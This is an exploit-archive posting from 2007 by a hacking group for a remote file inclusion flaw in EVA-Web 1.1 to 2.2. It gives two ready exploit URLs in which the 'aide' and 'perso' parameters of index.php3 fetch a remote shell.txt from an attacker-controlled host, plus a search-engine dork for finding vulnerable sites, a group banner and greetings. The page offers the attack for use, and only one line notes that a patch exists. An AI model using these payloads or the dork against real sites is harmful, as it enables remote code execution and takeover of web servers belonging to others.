EVA-Web 1.1<= 2.2 (index.php3) Remote File Inclusion Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : EVA-Web 1.1<= 2.2 (index.php3) Remote File Inclusion Vulnerabilities
# Published : 2007-06-26
# Author : g00ns
# Previous Title : phpSiteBackup 0.1 (pcltar.lib.php) Remote File Inclusion Vulnerability
# Next Title : WordPress 2.2 (wp-app.php) Arbitrary File Upload Exploit

###############################################################################################
#         ___   ___                         _
#        / _  / _                        | |
#   __ _| | | | | | |_ __  ___   _ __   ___| |_
#  / _` | | | | | | | '_ / __| | '_  / _  __|
# | (_| | |_| | |_| | | | __ _| | | |  __/ |_
#  __, |___/ ___/|_| |_|___(_)_| |_|___|__|
#   __/ |
#  |___/
###############################################################################################
#Program Title ################################################################################
#EVA-Web 1.1<=2.2 Remote File Inclusion
#
#Note #######################################################################################
#A patch was released some time ago..but there was never an exploit released..
#
#Script Download ##############################################################################
#http://spip-edu.edres74.net
#
#d0rk ######################################################################################
#"et utilise le squelette EVA-Web" -3.0 -2.3
#
#Spl0it #########################################################################################
#www.victim.com/[path to webapp]/eva/index.php3?aide=http://www.ursite.com/shell.txt?
#www.victim.com/[path to webapp]/eva/index.php3?perso=http://www.ursite.com/shell.txt?
#
#vuln discovered by ###############################################################################
#MurderSkillz
#
#shoutz: z3r0, milf, godxcel, clorox, katalyst, SyNiCaL, OD, pr0be, rezen, str0ke,
#fish, rey, canuck, ,vipsta, c0ma, grumpy, err0r, sick, trintitty, asdfhacks.com , a59, freeillwill.com, fury,
#<S>, Bernard, and everyone else at g00ns.net
###############################################################################################

# www.Syue.com [2007-06-26]